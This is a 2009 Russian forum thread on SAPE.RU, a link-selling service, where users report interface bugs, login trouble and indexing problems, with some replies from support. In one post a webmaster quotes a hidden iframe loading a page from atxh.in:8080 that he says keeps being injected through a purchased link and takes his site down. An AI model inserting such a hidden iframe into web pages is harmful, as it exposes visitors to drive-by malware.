Форум SAPE.RU

Форум SAPE.RU (http://forum.sape.ru/index.php)
-   Ошибки при работе с системой (http://forum.sape.ru/forumdisplay.php?f=14)
-   -   Глюки и ошибки интерфейса системы, пишем сюда (http://forum.sape.ru/showthread.php?t=19506)

Egor 09.08.2009 02:02

Не работает избранное, т.е. при поиске площадок под галкой "Отображать только избранные сайты"

humbert 10.08.2009 09:22

Не могу нормально работать с вновь добавленными площадками, в частности, не могу удалить страницы, пишет "Во время запроса произошла ошибка...".

FireWind 10.08.2009 10:32

Вложений: 1
Не работает чек-бокс "выделение всех" (для вебмастеров - площадки/заявки) - ставится только галочка в самом чекбоксе, а все чек-боксы ссылок на покупку остаются не тронуты.
FF 3.5.2
стоит плагин Винка


Очень неудобно в ручную для каждого сайта галочку ставить
Да еще - лучше сделать ее триггером - переворачивать состояние выделения

DEN 10.08.2009 16:33

Ошибка связи с сервером: Error in cURL request: Operation timed out after 5 seconds with 0 bytes received
Что делать ???

warlord---- 10.08.2009 17:56

Цитата:

Сообщение от warlord---- (Сообщение 529152)
нонсенс, это случается периодически и в одном и том же месте, т.е. скриптом. Внутри тега стоит купленная ссылка

<iframe src="http://atxh.in:8080/index.php" width=100 height=168 style="visibility: hidden"></iframe>
вот только что появилась, как обычно запарола 3 файла и сайт в дауне

rusboss 10.08.2009 19:27

Помогите активировать акаунт не приходит письмо на почту. Запрашивал его 5 раз ни одно не дошло. Незнаю где потерялось у нас на сервере или от вас не отправилось. Логин neftegaz

gee 11.08.2009 10:20

Не работает выбор нескольких фильтров

На стороне оптимизатора, на странице "Поиск площадок/Фильтры" не могу отметить сразу несколько фильтров. Раньше мог, сейчас система позволяет отметить только одну "кнопку". Что делать? Я покупаю по группе фильтров, в результате этой проблемы не могу работать.

Fernand 12.08.2009 07:44

Вчера добавил сайт оптимизатора в BL. Сегодня снова приходит ссылка на этот сайт. Захожу в BlackList - там этот сайт стоит :) Как такое возможно?

Karlush 12.08.2009 11:13

У кого еще проблема с чекбоксами???
 
Ситуация следущая: при выводе площадок по 10 штук чекбоксы присуствуют и закупка происходит в нормальном режиме, при выставлении вывода от 25 и более чекбоксы появляются на пару секунд и потом сразу исчезают. Мозилла 3.5.1. плагин винка

Маленькая сосна 12.08.2009 15:11

На главной странице (внутри) появилась ссылка "новых сообщений нет", которая ведет на ***, которая дает 403 ошибку.

Fernand 12.08.2009 15:24

интересно, тут вообще кто-нибудь на вопросы отвечает? :)

Добавлено через 7 минут
Я вижу ответов не предвидится, поэтому снова занес один и тот же сайт в BL. Надеюсь поможет...

Sirius220 12.08.2009 15:24

Бывает и такое :)

spellen 12.08.2009 16:18

Цитата:

Сообщение от gee (Сообщение 531044)
Не работает выбор нескольких фильтров

На стороне оптимизатора, на странице "Поиск площадок/Фильтры" не могу отметить сразу несколько фильтров. Раньше мог, сейчас система позволяет отметить только одну "кнопку". Что делать? Я покупаю по группе фильтров, в результате этой проблемы не могу работать.

Это не ошибка, так реализовано. Искать можно только по одному фильтру.

Добавлено через 43 секунды
Цитата:

Сообщение от Маленькая сосна (Сообщение 532415)
На главной странице (внутри) появилась ссылка "новых сообщений нет", которая ведет на ***, которая дает 403 ошибку.

Поправили

Добавлено через 1 минуту
Цитата:

Сообщение от FireWind (Сообщение 530004)
Не работает чек-бокс "выделение всех" (для вебмастеров - площадки/заявки) - ставится только галочка в самом чекбоксе, а все чек-боксы ссылок на покупку остаются не тронуты.
FF 3.5.2
стоит плагин Винка


Очень неудобно в ручную для каждого сайта галочку ставить
Да еще - лучше сделать ее триггером - переворачивать состояние выделения

Были временные проблемы, щас все работает.
У вас работает?

gee 13.08.2009 09:32

Цитата:

Сообщение от spellen (Сообщение 532479)
Это не ошибка, так реализовано. Искать можно только по одному фильтру.

Что значит "так реализовано"? Еще месяц назад можно было покупать по группе фильтров.

shhef 13.08.2009 12:37

не выставляются цены на новые площадки, логин nspsv... даже ставил галочку на "автоматическую устаноку цен" не помогло

ronald 13.08.2009 13:55

Цитата:

Сообщение от spellen (Сообщение 532479)
Были временные проблемы, щас все работает.
У вас работает?

До сих пор не работает "выделение всех" для вебмастера. FF 3.0.13, плагин Винка.

shhef 13.08.2009 17:42

я решил проблему "выделения всех" так: CTRL + движением скрола уменьшил шрифт...

на мой вопрос кто нибуть ответит?

Seocrat.ru 13.08.2009 21:48

только у меня не работает редактор фильтров или я что-то пропустил?

4ip 14.08.2009 10:47

Вопрос следующий
Вчера добавил новую площадку, т.е. активировал страницы, проставил цены и т.д.
Сайт хоть и нулевик, но показатели норм, тем более что когда сайт новый с него хорошо берут, особенное если прием ссылок на автомате.
Другой аналогичны сайт за сутки набрал около 50 ти ссылок.
ID 548201, мне кажется он как-то не добавился в базу или еще там что-то.
Посмотрите пожалуйста, заранее спасибо.

spellen 14.08.2009 11:54

Цитата:

Сообщение от 4ip (Сообщение 534091)
Вопрос следующий
Вчера добавил новую площадку, т.е. активировал страницы, проставил цены и т.д.
Сайт хоть и нулевик, но показатели норм, тем более что когда сайт новый с него хорошо берут, особенное если прием ссылок на автомате.
Другой аналогичны сайт за сутки набрал около 50 ти ссылок.
ID 548201, мне кажется он как-то не добавился в базу или еще там что-то.
Посмотрите пожалуйста, заранее спасибо.

Поправили

Добавлено через 14 секунд
Цитата:

Сообщение от Seocrat.ru (Сообщение 533743)
только у меня не работает редактор фильтров или я что-то пропустил?

Что именно не работает?

Добавлено через 2 минуты
Цитата:

Сообщение от ronald (Сообщение 533277)
До сих пор не работает "выделение всех" для вебмастера. FF 3.0.13, плагин Винка.

Попрбуйте ctrl+f5
Только что проверил, все работает.

Добавлено через 1 минуту
Цитата:

Сообщение от shhef (Сообщение 533217)
не выставляются цены на новые площадки, логин nspsv... даже ставил галочку на "автоматическую устаноку цен" не помогло

------
Цены не могут превышать средние более чем в 10 раз.

Минимальный шаг цены 1 копейка.

Минимальная цена 25 копеек.
-------

Iwashka 14.08.2009 13:02

Здравствуйте.
Добавляю сайт в систему.
При индексации саповским роботом - не находит ни одной страницы.
В чём может быть проблема?

Цитата:

кривые настройки хостинга
Это отпадает сразу)

На сайте установлен Wordpress, кодировка UTF-8.

zetex 14.08.2009 14:22

Давно хотел спросить про СЛИПы.
Они что, теперь могут больше заявленных 30 дней висеть? Раньше думал, что глюк, систему отлаживали. Сегодня смотрю, опять несколько ссылок в СЛИПе больше месяца.
Такие есть и с буквой М, и с буквой В. В чем дело, непонятно.

Добавлено через 10 минут
Цитата:

Сообщение от Iwashka (Сообщение 534247)
Здравствуйте.
Добавляю сайт в систему.
При индексации саповским роботом - не находит ни одной страницы.
В чём может быть проблема?

Проверьте, есть ли на страницах, где должны быть ссылки, что-то типа <!--0123456789-->
В коде $o['force_show_code'] = true есть? Если нету, поставьте. В таких случаях помогает.

ronald 14.08.2009 14:44

Цитата:

Сообщение от spellen (Сообщение 534143)
Попрбуйте ctrl+f5
Только что проверил, все работает.
-------

Неа, не работает. И как видно, не у одного меня.

Iwashka 14.08.2009 14:48

В исходном коде появилось check_code без цифр.
При добавлении в сапу - ничего не изменилось, бот ни странички не съел.

zetex 14.08.2009 15:12

Цитата:

Сообщение от Iwashka (Сообщение 534366)
В исходном коде появилось check_code без цифр.
При добавлении в сапу - ничего не изменилось, бот ни странички не съел.

Надо ФАК читать про установку кода. Я не помню, что значит <!--check_code--> без цифр. Но у меня страницы при переиндексации не добавлялись, пока force_show_code не добавил.
А хост прописан?
$o['host'] = 'site.ru'

Iwashka 14.08.2009 15:19

Цитата:

$o['host'] = 'site.ru'
Не помогло.

zetex 14.08.2009 15:24

Цитата:

Сообщение от Iwashka (Сообщение 534412)
Не помогло.

Смотрите http://www.sape.ru/faq.php?q_id=257

Там подробно про Ваш случай и форма обратной связи с саппортом.

Belcat 14.08.2009 15:55

Цитата:

Сообщение от ronald (Сообщение 533277)
До сих пор не работает "выделение всех" для вебмастера. FF 3.0.13, плагин Винка.

Такая же ситуация. В чем может быть причина?

feroman 14.08.2009 18:34

Пытаюсь зайти в систему, уже второй день не пускает. После ввода пользователя и пароля выдает начальную страницу с пустыми полями для ввода.

Iwashka 14.08.2009 18:37

Качаю шаблоны с паблика для Вордпресса - не со всех шаблонов сапобот кушает ссылки.

Spaiz 15.08.2009 11:25

А у меня пропала панелька с левой стороны, где находится статистика заработка, вывод средств, документы, курс у.е. и т.п. Немного полазил, оказалось, что просто скрыт див id="aside" style="display: none;" о_О

CjClub 15.08.2009 11:27

Цитата:

Сообщение от Spaiz (Сообщение 534999)
А у меня пропала панелька с левой стороны, где находится статистика заработка, вывод средств, документы, курс у.е. и т.п. Немного полазил, оказалось, что просто скрыт див id="aside" style="display: none;" о_О

Плагин Винка используешь ?

Spaiz 15.08.2009 15:13

Цитата:

Сообщение от CjClub (Сообщение 535001)
Плагин Винка используешь ?

Использую. Отключил, всё заработало.. Спасибо.

vladische 16.08.2009 18:06

не могу удалить площадку... странно, вроде всё работает - панель управления, даже ссылки все поудалял, уже пару часов пытаюсь - ошибка 504... всё остальное работает, настройки меняются и сохраняются, удалить - не выходит

zetex 16.08.2009 19:33

Так объяснит кто-нибудь, почему слипы висят больше 30 дней?

Есть четыре предположения.

1. Слипы больше не удаляются системой, надо следить и разбираться с ними самому.
2. Ошибка в системе, над ней работают и поправят. Может быть. Когда-нибудь.
3. Мигуны-оптимизаторы нашли лазейку в системе, чтоб заставить слипы висеть вечно. Непонятно, правда, зачем это для самых дешевых ссылок.
4. Это очередная "багофича", и никто не знает, откуда это берется и как с этим справиться.

Добавлено через 15 минут
Есть и пятое предположение, что некоторые оптимизаторы в САПЕ на особом статусе, и их ссылки никогда не удаляются или удаляются через гораздо бОльший срок, чем 30 дней.

Но в это уж совсем не хотелось бы верить.

stalevarov 18.08.2009 10:52

Есть две площадки.
Первая id 535834, страниц 271, ссылок продано 155.
Вторая id 549029, страниц 94 ссылок продано 9.
Проверил из панели оптимизатора. В поиске выдает только морды и те страницы с которых были убраны вэйти. Тоесть оптимизатор видит не все доступные страницы сайты а только часть, которые и были распроданы. Все страницы в статусе «ок».

trxtr 21.08.2009 12:02

ID площадки 123188
в списке заявок несколько ссылок с одного сайта. выбираю одну из них, выбираю "Добавить в BL", исполняю. Перезагружаю страничку с заявками, рассчитывая, что остальные заявки с этого сайта тоже пропадут из списка. И нифига подобного.

Planet 25.08.2009 09:16

id=542621
Не могу удалить площадку из системы уже несколько дней
после ввода delete выдает сообщение Ошибка сервера!

karamelka 26.08.2009 00:46

открываю sape.ru - открывается,
захожу - глюк. - чистая страница: вообще чистая.
приходится вообще броузер перезапускать, что бы хоты бы на певую страницу для входа попасть.
ни время, ни количество попыток роли не играют и на результат не влияют.

Arowana 26.08.2009 03:44

В мозиле сейчас косяк какой-то, главная нормально, после авторизации полностью убивается шаблон и разметка. Ничего поделать не могу, кеш, куки чистил - не помогает :(.


Часовой пояс GMT +3, время: 04:49.

Работает на vBulletin® версия 3.8.7.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot
SAPE.RU — система купли-продажи ссылок с главных и внутренних страниц сайтов.